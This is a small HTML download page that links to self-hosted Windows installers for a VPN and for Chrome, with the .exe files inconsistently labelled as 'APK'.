<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>My App Download</title>
    <link rel="stylesheet" href="index.css">
</head>
<body>

    <main>
        <h1>VPN for Windows</h1>
        <div class="download-box">
            <h2>Version v3</h2>
            <p>APK Size: 81 MB</p>
            <a href="/proton-vpn-3-5-3.exe" download>Download APK</a>
        </div>
        <h1>Chrome for Windows</h1>
        <div class="download-box">
            <h2>Version latest</h2>
            <p>APK Size: 10 MB</p>
            <a href="/ChromeSetup.exe" download>Download APK</a>
        </div>
      <h1>Chrome  for Windows</h1>
        <div class="download-box">
            <h2>Version Beta</h2>
            <p>APK Size: 10 MB</p>
            <a href="/ChromeSetup2.exe" download>Download APK</a>
        </div>
    </main>

</body>
</html>
